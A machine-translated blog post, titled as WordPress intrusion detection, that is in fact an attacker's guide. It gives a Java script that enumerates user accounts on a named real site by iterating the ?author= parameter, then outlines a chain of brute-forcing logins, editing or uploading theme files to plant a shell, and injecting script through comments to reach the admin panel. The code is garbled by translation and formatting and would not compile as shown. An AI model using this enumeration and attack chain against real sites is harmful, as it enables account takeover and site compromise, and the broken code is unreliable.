WordPress blog intrusion detection skills

Paste my wordpress user script capture first

Import java. io. bufferedReader; import java. io. file; import java. io. fileWriter; import java. io. IOException; import java. io. inputStreamReader; import java.net. URL;/*** WordpressGetUser * Group class used to match and capture html page data * @ author itleaf- http://blog.itleaf.info */Public class wpUserCollection {public static void main (String [] args) {int set = 1116; // set the number of cycles int I = 1; // for loop to obtain all users for (I = 1; I <= set; I ++) {String strUrl =" http://drops.wooyun.org/?author= "+ I; try {URL url = new URL (strUrl); InputStreamReader isr = new InputStreamReader (url. openStream (), "UTF-8"); // use the UTF-8 encoding mode in a unified manner. // use BufferedReader to read the character converted from InputStreamReader to BufferedReader br = new BufferedReader (isr ); string strRead = ""; // Add an empty String strRead to load the content read by BufferedReader // define a regular expression to match the required data String regularUser = "> [^ <>] * </title>"; // create a GroupMethod Class Object gMethod to facilitate later calling of regularGro in its class Up Method GroupMethod gMethod = new GroupMethod (); while (strRead = br. readLine ())! = Null) {/*** used to get the username */String strGet = gMethod. regularGroup (regularUser, strRead); if (! StrGet. equals ("") {// here the substring method is also used to remove the '<' and "</a>" labels to obtain the strGet = strGet result. substring (1, strGet. indexOf (""); File file = new File ("e: // wpUser.txt"); FileWriter out = new FileWriter (file, true); out. write (strGet + "\ r \ n"); // append a line break and save it to out. close (); System. out. println (strGet) ;}} br. close (); // close reader} catch (IOException e) {System. out. println ("error, no such user! ") ;}}} Import java. util. regex. matcher; import java. util. regex. pattern; public class GroupMethod {// input two String parameters. One is pattern (the regular expression we use), and the other is the html source code public String regularGroup (String pattern, String matcher) {Pattern p = Pattern. compile (pattern, Pattern. CASE_INSENSITIVE); Matcher m = p. matcher (matcher); if (m. find () {// if you read return m. group (); // return the captured data} else {return ""; // otherwise, an empty string is returned }}}

 

In the case of no 0-day, my idea is to collect users-brute-force cracking-successful brute-force cracking-Change the topic file/upload the topic package and so on-shell sometimes encounters/wp-admin/directory ip Access. restrictions, bae, sae and other environments are in trouble ~ However, you can add scripts and other labels (for example, in the comment box, target.com/wp-login.php can be used to access the background without authorization) to the Administrator and edit permissions. Then I don't know how to play with it ~